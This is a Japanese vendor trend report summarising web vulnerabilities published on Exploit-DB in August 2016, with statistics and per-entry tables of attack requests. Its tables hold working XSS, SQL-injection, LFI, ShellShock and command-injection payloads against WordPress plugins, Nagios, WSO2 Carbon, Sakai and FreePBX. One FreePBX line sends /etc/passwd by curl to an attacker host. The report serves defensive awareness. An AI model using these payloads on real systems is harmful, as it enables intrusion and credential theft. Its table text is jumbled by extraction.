Untitled - Penta Security Systems Inc.

2016.08
EDB-Report
最新Web脆弱性トレンドレポート(2016.08)
2016.08.01~2016.08.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
ペンタセキュリティシステムズ株式会社R&Dセンター データセキュリティチーム
サマリー
2016年8月に公開されたExploit-DBの分析結果、Cross Site Scriptingの攻撃に対する脆弱性報告件数が最も多かったです。発見されたCross Site Scriptingらの攻撃は単にスクリプトを使用したり、イメージタグを使用す
るなどの攻撃難易度や危険度の側面ではレベルの高い攻撃パターンではありませんでした 。しかし、Cross Site Scriptingの攻撃は、スクリプトおよび特定タグが実行されると、脆弱な部分に実際の多様なコードが挿入ができる攻撃
なので、スクリプトおよびタグなどの実行自体ができないようにしなければなりません。したがって、脆弱性が発見された該当ソフトウェアを使用する管理者はそのスクリプトおよびイメージタグが実行されるかを確認した後、必ずセキュアコー
ディングおよびアップデートが必要と考えられます。Cross Site Scripting以外の脆弱性では、Linux Bashの脆弱性としてよく知られているShellShockの脆弱性が発見されました。攻撃パターンは、主にHTTP Headerに入り、
CGIが実行される際、任意の命令語が実行されることができます。2014年に初めて発見されたShellShockの脆弱性は、OpenSSLの脆弱性であるHeartBleed脆弱性よりもっと波及力が大きな脆弱性でしたが、現在はBash
Updateを最新に実施して、解決することができます。古いバージョンのLinuxを使用している管理者であればこのようなセキュリティアップデートを実施し、ShellShockと同じ脆弱性に露出されて、規模の大きいセキュリティ事故とつなが
らないように注意しなければなりません。
14
1. 脆弱性別件数
脆弱性カテゴリ
ファイルアップロード
(File Upload)
リモートコマンド実行
(Remote Command Execution)
ディレクトリトラバーサル
(Directory Traversal)
ローカルファイル挿入
(Local File Inclusion:LFI)
コマンド インジェクション
(Command Injection)
SQL インジェクション
(SQL Injection)
クロスサイトスクリプティング
(Cross Site Scripting : XSS)
合計
脆弱性別件数
件数
12
1
12
2
10
10
2
8
4
6
5
5
4
4
10
2
12
36
2
2
Remote
Command
Execution
Directory
Traversal
1
0
File Upload
LFI
Command
Injection
SQL Injection
XSS
危険度別件数
2. 危険度別件数
危険度
早急対応要
高
合計
件数
割合
3
33
36
8%
92%
100%
3
早急対応要
高
33
3. 攻撃実行の難易度別件数
難易度
件数
割合
難
中
易
合計
3
12
32
49
6%
24%
65%
100%
攻撃実行の難易度別件数
3
12
難
中
易
32
4. 主なソフトウェア別脆弱性発生件数
ソフトウェア名
WSO2 Carbon
Nagios Network Analyzer
Wordpress
Sakai
Nagios Incident Manager
NUUO NVRmini
FreePBX
Navis WebAccess
Nagios Log Server
PHP Power Browse
chatNow
phpCollab CMS
Davolink
Subrion CMS
Zabbix
WebNMS Framework Server
合計
件数
7
5
5
4
2
2
2
1
1
1
1
1
1
1
1
1
36
主なソフトウェア別脆弱性発生件数
WSO2 Carbon
1
1
1
1
Nagios Network Analyzer
7
Wordpress
1
1
Sakai
1
Nagios Incident Manager
1
NUUO NVRmini
FreePBX
2
5
Navis WebAccess
Nagios Log Server
2
PHP Power Browse
2
chatNow
4
5
phpCollab CMS
Davolink
EDB-Report
最新Web脆弱性トレンドレポート(2016.08)
2016.08.01~2016.08.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
日付
2016-08-01
2016-08-01
EDB番号
40190
40189
脆弱性カテゴリ
XSS
SQL Injection
攻撃難脆弱性度
中
難
危険度
高
早急対応要
脆弱性名
攻撃コード
対象プログラム
対象環境
Wordpress
WordPress WP
Live Chat Support
Plugin 6.2.03
Wordpress
WordPress
Booking Calendar
Plugin 6.2
Wordpress
WordPress Count
per Day Plugin
3.5.4
Davolink
Davolink DV2051
PHP Power
Browse
PHP Power
Browse 1.2
Subrion CMS
Subrion CMS
4.0.5
POST /wp-admin/admin-ajax.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64
AppleWebKit/535.7 KHTML, like Gecko
Chrome/16.0.912.75 Safari/535.7
Accept: */*
Content-Type: application/x-www-form-urlencoded;
charset=UTF-8
WordPress WP Live Chat
Support Plugin 6.2.03 - adminajax.php XSS 脆弱性
action=wplc_user_send_offline_message&security=8d1f
c19e30&cid=1&name=<script>eval(String.fromCharCod
e(97, 108, 101, 114, 116, 40, 34, 88, 83, 83, 32, 105,
110, 32, 110, 97, 109, 101, 33, 34, 41,
59));</script>&email=Mail&msg=<script>eval(String.fro
mCharCode(97, 108, 101, 114, 116, 40, 34, 88, 83, 83,
32, 105, 110, 32, 109, 115, 103, 33, 34, 41,
59));</script>
WordPress Booking Calendar
Plugin 6.2 - SQL Injection
POST /wp-admin/admin.php?page=booking%2Fwpdevbooking.phpwpdevbooking&wh_approved&wh_is_new=1&wh_booking_d
ate=3&view_mode=vm_listing HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64
AppleWebKit/535.7 KHTML, like Gecko
Chrome/16.0.912.75 Safari/535.7
Accept: */*
Content-Type: application/x-www-form-urlencoded;
charset=UTF-8
wh_booking_id=3 AND (SELECT 5283 FROM(SELECT
COUNT(*),CONCAT(0x7176626271,(SELECT
MID((IFNULL(CAST(user_pass AS CHAR),0x20)),1,54)
FROM wordpress.wp_users ORDER BY ID LIMIT
0,1),0x717a787a71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY
x)a)
2016-08-05
40206
XSS
中
高
2016-08-05
40205
XSS
易
高
2016-08-05
40204
LFI
易
高
2016-08-05
40202
SQL Injection
易
高
GET / HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X
10_11_5) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/51.0.2704.103 Safari/537.36
WordPress Count per Day Plugin
Referer:
3.5.4 - / XSS 脆弱性
javascript:c=String.fromCharCode;alert(c(83)+c(117)+c(
109)+c(79)+c(102)+c(80)+c(119)+c(110)+c(46)+c(110)
+c(108))
/scvrtsrv.cmd?action=add&srvName=FooBar<iframe%2
Davolink DV-2051 - / XSS 脆弱性 0onload=alert(0)>&srvAddr=192.168.1.100&proto=1,&
eStart=4444,&eEnd=4444,iStart=4444,&iEnd=4444,
PHP Power Browse 1.2 browse.php LFI 脆弱性
Subrion CMS 4.0.5 /admin/database/sql/ SQL
Injection 脆弱性
/browse.php?p=source&file=/etc/passwd
POST /admin/database/sql/ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64
AppleWebKit/535.7 KHTML, like Gecko
Chrome/16.0.912.75 Safari/535.7
Accept: */*
Content-Type: application/x-www-form-urlencoded;
charset=UTF-8
query=1 and 1=1--&show_query=1 or 1=1-&exec_query=Go
Copyright 2016 Penta Security Systems Inc. All rights reserved
EDB-Report
最新Web脆弱性トレンドレポート(2016.08)
2016.08.01~2016.08.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
日付
EDB番号
脆弱性カテゴリ
攻撃難脆弱性度
危険度
脆弱性名
攻撃コード
対象プログラム
対象環境
POST / HTTP/1.1
Host:
User-Agent: () { :;}; /bin/ls -al
2016-08-06
40213
Remote Command
Execution
難
早急対応要
NUUO NVRmini 2 3.0.8 - /cgibin/cgi_system RCE 脆弱性
Accept: */*
Content-Type: application/x-www-form-urlencoded;
NUUO NVRmini
charset=UTF-8
NUUO NVRmini 2
3.0.8
cmd=ftp_setup&act=modify&com_port=21&pasv_port_fr
om=1024&pasv_port_to=65535&services=enable
2016-08-06
40212
Command Injection
易
高
NUUO NVRmini 2 3.0.8 - /cgibin/cgi_system Command
Injection 脆弱性
POST /cgi-bin/cgi_system?cmd=saveconfig HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64
AppleWebKit/535.7 KHTML, like Gecko
Chrome/16.0.912.75 Safari/535.7
Accept: */*
Content-Type: application/x-www-form-urlencoded;
charset=UTF-8
NUUO NVRmini
NUUO NVRmini 2
3.0.8
phpCollab CMS
phpCollab CMS
2.5
bfolder=%2Fmtd%2Fblock3&bfile=|ping%20n%200%20localhost&inc_emap=no&inc_pos=no
2016-08-08
2016-08-08
40218
40216
SQL Injection
SQL Injection
易
易
高
phpCollab CMS 2.5 /phpcollab/users/emailusers.php?id=1%20or%201=1-emailusers.php SQL Injection 脆
&&PHPSESSID=ghtu76jt276nji04lua07930t5
弱性
高
/express/showNotice.do?report_type=1&GKEY=2 AND
9753=(SELECT
Navis WebAccess UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(10
showNotice.do SQL Injection 脆 6)||CHR(118)||CHR(98)||CHR(113)||(SELECT (CASE
Navis WebAccess Navis WebAcces
弱性
WHEN (9753=9753) THEN 1 ELSE 0 END) FROM
DUAL)||CHR(113)||CHR(107)||CHR(107)||CHR(118)||CHR(
113)||CHR(62))) FROM DUAL)
2016-08-10
40229
Directory Traversal
易
高
2016-08-15
40237
SQL Injection
易
高
2016-08-16
40241
XSS
易
高
POST
/servlets/FileUploadServlet?fileName=../jsp/Login.jsp
HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64
WebNMS Framework Server 5.2
AppleWebKit/535.7 KHTML, like Gecko
and 5.2 SP1 - /servlets/ Directory
Chrome/16.0.912.75 Safari/535.7
Traversal 脆弱性
Accept: */*
Content-Type: application/x-www-form-urlencoded;
charset=UTF-8
WebNMS
Framework
Server
WebNMS
Framework
Server 5.2 and
5.2 SP1
/latest.php?output=ajax&sid=&favobj=toggle&toggle_o
Zabbix 2.2.x, 3.0.x - latest.php
pen_state=1&toggle_ids[]=15385)%3B%20select%20
SQL Injection 脆弱性
*%20from%20users%20where%20(1%3D1
Zabbix
Zabbix 2.2.x,
3.0.x
/carbon/identity-mgt/challengesWSO2 Carbon 4.4.5 mgt.jsp?addRowId=XSS&setName="/><script>alert(docu
challenges-mgt.jsp XSS 脆弱性
ment.cookie)</script>
WSO2 Carbon
WSO2 Carbon
4.4.5
Copyright 2016 Penta Security Systems Inc. All rights reserved
EDB-Report
最新Web脆弱性トレンドレポート(2016.08)
2016.08.01~2016.08.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
日付
EDB番号
脆弱性カテゴリ
攻撃難脆弱性度
危険度
2016-08-16
40240
LFI
易
高
脆弱性名
40252
Command Injection
中
高
/nagiosim/reports/download/
Command Injection 脆弱性
2016-08-16
40251
SQL Injection
中
高
対象プログラム
対象環境
WSO2 Carbon
WSO2 Carbon
4.4.5
yMDE2LTA1LTA2JmVuZF9kYXRlPTIwMTYtMDUtMDYmdHl
Nagios Incident
Nagios Incident
wZXNbXT0yIiIiO3t0b3VjaCwvdG1wL01ZRklMRX07ZWNob
Manager
Manager 2.0.0
WSO2 Carbon 4.4.5 /carbon/log-view/downloadgzdownloadgz-ajaxprocessor.jsp ajaxprocessor.jsp?logFile=../../repository/conf/registry.x
LFI 脆弱性
ml&tenantDomain=&serviceName=
Nagios Incident Manager 2.0.0 2016-08-16
攻撃コード
/nagiosim/reports/download/jpg/mttr/c3RhcnRfZGF0ZT0
w==
/nagiosna/index.php/api/checks/read?q%5Blastcode%5
Nagios Network Analyzer 2.2.0 D=0&o%5Bcol%5D=name%20AND%20(SELECT%20* Nagios Network
/nagiosna/index.php/api/checks
%20FROM%20(SELECT(SLEEP(5)))UtTW)&o%5Bsort%
Analyzer
/ SQL Injection 脆弱性
5D=ASC
Nagios Network
Analyzer 2.2.0
POST /nagioslogserver/api/check/create/1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64
AppleWebKit/535.7 KHTML, like Gecko
Chrome/16.0.912.75 Safari/535.7
Accept: */*
Content-Type: application/x-www-form-urlencoded;
2016-08-16
40250
Command Injection
中
高
Nagios Log Server 1.4.1 -
charset=UTF-8
Nagios Log
Nagios Log
Server
Server 1.4.1
Nagios Incident
Manager
Nagios Incident
Manager 2.0.0
Nagios Network Analyzer 2.2.0 - /nagiosna/index.php/api/sources/read?o%5Bcol%5D=n
Nagios Network
/nagiosna/index.php/api/source ame%20AND%20(SELECT%20*%20FROM%20(SELEC
Analyzer
s/ SQL Injection 脆弱性 #
T(SLEEP(5)))UtTW)&o%5Bsort%5D=ASC
Nagios Network
Analyzer 2.2.0
Multiple Vulnerabilities
alert={"name"%3a"StduserAlertTest","check_interval"%3a"
1m","lookback_period"%3a"1m","warning"%3a"1","critical"
%3a"1","method"%3a{"type"%3a"exec","path"%3a"/bin/to
uch",
"args"%3a"/tmp/STDUSER"},"alert_crit_only"%3a0,"created
_by"%3a"stduser","query_id"%3a"AVTLGmdGYGKrkWMo5Tc"}
2016-08-16
40252
SQL Injection
難
早急対応要
2016-08-16
40251
SQL Injection
中
高
POST /nagiosim/admin/settings HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64
AppleWebKit/535.7 KHTML, like Gecko
Chrome/16.0.912.75 Safari/535.7
Accept: */*
Content-Type: application/x-www-form-urlencoded;
Nagios Incident Manager 2.0.0 charset=UTF-8
/nagiosim/admin/settings SQL
Injection 脆弱性
timezone=Pacific/Samoa' AND (SELECT 5323
FROM(SELECT
COUNT(*),CONCAT(0x717a7a7171,(MID((IFNULL(CAST
(DATABASE() AS
CHAR),0x20)),1,54)),0x7170786a71,FLOOR(RAND(0)*
2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS
GROUP BY x)a) AND '
Copyright 2016 Penta Security Systems Inc. All rights reserved
EDB-Report
最新Web脆弱性トレンドレポート(2016.08)
2016.08.01~2016.08.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
日付
2016-08-16
EDB番号
40251
脆弱性カテゴリ
SQL Injection
攻撃難脆弱性度
中
危険度
高
脆弱性名
40251
Command Injection
中
高
/nagiosna/index.php/download/r
eport/sourcegroup/ Command
Injection 脆弱性
Nagios Network Analyzer 2.2.0 2016-08-16
40251
Command Injection
中
高
/nagiosna/index.php/download/r
eport/source/ Command
Injection 脆弱性
2016-08-16
2016-08-16
40241
40241
XSS
XSS
易
易
高
高
対象プログラム
POST /nagiosna/index.php/admin/globals HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64
AppleWebKit/535.7 KHTML, like Gecko
Chrome/16.0.912.75 Safari/535.7
Accept: */*
Content-Type: application/x-www-form-urlencoded;
Nagios Network Analyzer 2.2.0 charset=UTF-8
Nagios Network
/nagiosna/index.php/admin/
Analyzer
SQL Injection 脆弱性 #
timezone=US/Eastern%' AND (SELECT 4646
FROM(SELECT COUNT(*),CONCAT(0x232323,(SELECT
MID((IFNULL(CAST(apikey AS CHAR),0x20)),1,54) FROM
nagiosna_users WHERE id=1 LIMIT
0,1),0x232323,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY
x)a) AND '%'=''
Nagios Network Analyzer 2.2.0 2016-08-16
攻撃コード
/nagiosna/index.php/download/report/sourcegroup/test/
cVtyaWRdPTUmcVtnaWRdPTEiICIiO3t0b3VjaCwvdG1wL1R
FU1RGSUxFfTtlY2hvICI=
/nagiosna/index.php/download/report/source/test/cVtya
WRdPTUmcVtnaWRdPTEiICIiO3t0b3VjaCwvdG1wL1RFU1R
GSUxFfTtlY2hvICI=
/carbon/identity-mgt/challenges-mgtfinish.jsp?setName=%22%2F%3E%3Cscript%3Ealert
%28document.cookie%29%3C%2Fscript%3E&questio
n0=&question1=City+where+you+were+born+%3F&set
Id1=http%3A%2F%2Fwso2.org%2Fclaims%2Fchallen
geQuestion1&question1=City+where+you+were+born+
%3F&question2=Father%27s+middle+name+%3F&setI
d2=http%3A%2F%2Fwso2.org%2Fclaims%2Fchalleng
eQuestion1&question2=Father%27s+middle+name+%
3F&question3=Name+of+your+first+pet+%3F&setId3=
http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQu
estion2&question3=Name+of+your+first+pet+%3F&qu
estion4=Favorite+sport+%3F&setId4=http%3A%2F%2
WSO2 Carbon 4.4.5 Fwso2.org%2Fclaims%2FchallengeQuestion2&question
challenges-mgt-finish.jsp XSS 脆 4=Favorite+sport+%3F&question5=Favorite+food+%3F
弱性 #
&setId5=http%3A%2F%2Fwso2.org%2Fclaims%2Fcha
llengeQuestion1&question5=Favorite+food+%3F&quest
ion6=Favorite+vacation+location+%3F&setId6=http%3
A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion1
&question6=Favorite+vacation+location+%3F&question
7=Model+of+your+first+car+%3F&setId7=http%3A%2
F%2Fwso2.org%2Fclaims%2FchallengeQuestion2&que
stion7=Model+of+your+first+car+%3F&question8=Na
me+of+the+hospital+where+you+were+born+%3F&set
Id8=http%3A%2F%2Fwso2.org%2Fclaims%2Fchallen
geQuestion2&question8=Name+of+the+hospital+wher
e+you+were+born+%3F&setId9=%22%2F%3E%3Cscr
ipt%3Ealert%28document.cookie%29%3C%2Fscript
%3E&question9=XSS
WSO2 Carbon 4.4.5 webapp_info.jsp XSS 脆弱性
/carbon/webapplist/webapp_info.jsp?webappFileName=odata.war&web
appState=all&hostName=victimserver&httpPort=9763&defaultHostName=victimserver&webappType=%22/%3E%3Cscript%3Ealert%2
8%27XSS%20hyp3rlinx%20\\n\\n%27%20%2bd
ocument.cookie%29%3C/script%3E
対象環境
Nagios Network
Analyzer 2.2.0
Nagios Network
Nagios Network
Analyzer
Analyzer 2.2.0
Nagios Network
Nagios Network
Analyzer
Analyzer 2.2.0
WSO2 Carbon
WSO2 Carbon
4.4.5
WSO2 Carbon
WSO2 Carbon
4.4.5
/carbon/ndatasource/newdatasource.jsp?dsName=%22o
2016-08-16
40241
XSS
易
高
WSO2 Carbon 4.4.5 newdatasource.jsp XSS 脆弱性
nMouseMove=%22alert%28%27XSS%20by%20hyp3rlinx%
20\\n\\n%27%2bdocument.cookie%29&edit=HELL
Copyright 2016 Penta Security Systems Inc. All rights reserved
WSO2 Carbon
WSO2 Carbon
4.4.5
EDB-Report
最新Web脆弱性トレンドレポート(2016.08)
2016.08.01~2016.08.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
日付
EDB番号
脆弱性カテゴリ
攻撃難脆弱性度
危険度
脆弱性名
攻撃コード
対象プログラム
対象環境
WSO2 Carbon
WSO2 Carbon
4.4.5
WSO2 Carbon
WSO2 Carbon
4.4.5
Wordpress
WordPress 4.5.3
Sakai
Sakai 10.7
Sakai
Sakai 10.7
Sakai
Sakai 10.7
2016-08-16
40241
XSS
易
高
WSO2 Carbon 4.4.5 validateconnectionajaxprocessor.jsp 脆弱性
/carbon/ndatasource/validateconnectionajaxprocessor.jsp?&dsName=WSO2_CARBON_DB&drive
r=com.mysql.jdbc.Driver&url=%22/%3E%3Cscript%3E
alert%28666%29%3C/script%3E&username=root&dsT
ype=RDBMS&customDsType=RDBMS&dsProviderType=
default&dsclassname=undefined&dsclassname=undefin
ed&dsproviderProperties=undefined&editMode=false&c
hangePassword=true&newPassword=
2016-08-16
40241
XSS
易
高
WSO2 Carbon 4.4.5 handlers.jsp XSS 脆弱性
/carbon/viewflows/handlers.jsp?retainlastbc=true&flow
=in&phase=%22/%3E%3Cscript%3Ealert%28docume
nt.cookie%29%3C/script%3E
POST /wp-admin/admin-ajax.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64
AppleWebKit/535.7 KHTML, like Gecko
WordPress 4.5.3 - admin2016-08-22
40288
Directory Traversal
易
高
Chrome/16.0.912.75 Safari/535.7
ajax.php Directory Traversal 脆弱 Accept: */*
性
Content-Type: application/x-www-form-urlencoded;
charset=UTF-8
plugin=../../../../../../../../../../dev/random&action=updateplugin
2016-08-22
40286
File Upload
中
高
POST /sakai-fckconnector/web/editor/filemanager/browser/default/con
nectors/jsp/connector/user/admin/?Command=FileUplo
ad&Type=JSP&CurrentFolder=%2Fgroup%2FPortfolioA
dmin%2F HTTP/1.1
Host:
Connection: CloseAccept: text/html,
application/xhtml+xml, */*
Accept-Language: ko-KR
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0;
Sakai 10.7 - / File Upload 脆弱性 Windows NT 6.2; WOW64; Trident/6.0)
Content-Type: multipart/form-data; boundary=--------------------------7dd10029908f2
-----------------------------7dd10029908f2
Content-Disposition: form-data; name="file";
filename="test.jsp'-alert(1)-'foo"
Content-Type: application/octet-stream
test
-----------------------------7dd10029908f2--
Sakai 10.7 2016-08-22
40286
XSS
易
高
/portal/tool/~admin-1010/ XSS
脆弱性
2016-08-22
40286
XSS
易
高
/portal/tool/~admin1010/create_job?_id2:job_name=TEST';alert(2)//&_id2%3A
_id10=Data+Warehouse+Update&_id2:_id14=Post&com.
sun.faces.VIEW=&_id2=_id2
Sakai 10.7 /access/basiclti/site/~admin/axxm4j<img src=a
/access/basiclti/site/~admin/ XSS
onerror=alert(3)>
脆弱性
Copyright 2016 Penta Security Systems Inc. All rights reserved
EDB-Report
最新Web脆弱性トレンドレポート(2016.08)
2016.08.01~2016.08.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
日付
EDB番号
脆弱性カテゴリ
攻撃難脆弱性度
危険度
2016-08-22
40286
LFI
易
高
脆弱性名
攻撃コード
/portal/tool/41fec34b-a47c-4aa5-8786Sakai 10.7 - /portal/tool/ LFI 脆
3873533f44fa/CvnkzU-31z-1QPe7Z2iQOA/../WEB弱性
INF/web.xml
対象プログラム
対象環境
Sakai
Sakai 10.7
chatNow
chatNow
Wordpress
WordPress Mail
Masta Plugin 1.
2016-08-23
40293
XSS
易
高
POST
/chatNow/login.php/95fb4"><script>alert(45)</script>b
5ca1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64
chatNow - login.php XSS 脆弱性
AppleWebKit/535.7 KHTML, like Gecko
Chrome/16.0.912.75 Safari/535.7
Accept: */*
Content-Type: application/x-www-form-urlencoded;
charset=UTF-8
2016-08-23
40290
LFI
易
高
WordPress Mail Masta Plugin /wp-content/plugins/mail1.0 - count_of_send.php LFI 脆 masta/inc/campaign/count_of_send.php?pl=/etc/passw
弱性
d
2016-08-29
40296
Remote Command
Execution
中
高
FreePBX 13.0.35 - config.php
RCE 脆弱性
/admin/config.php?display=modules&action=upload&d
ownload=0x4148&remotemod=http://127.0.0.1/junk%
26x=$(cat /etc/passwd);curl -d "$x"
http://Attacker_server:8080/0x4148.jnk
FreePBX
FreePBX 13.0.35
2016-08-29
40312
SQL Injection
中
高
FreePBX 13.0.35 - config.php
SQL Injection 脆弱性
/admin/config.php?display=f4ris"XOR(if(6661=6661,sle
ep(0.03),0))OR"*/
FreePBX
FreePBX 13.0.35
Copyright 2016 Penta Security Systems Inc. All rights reserved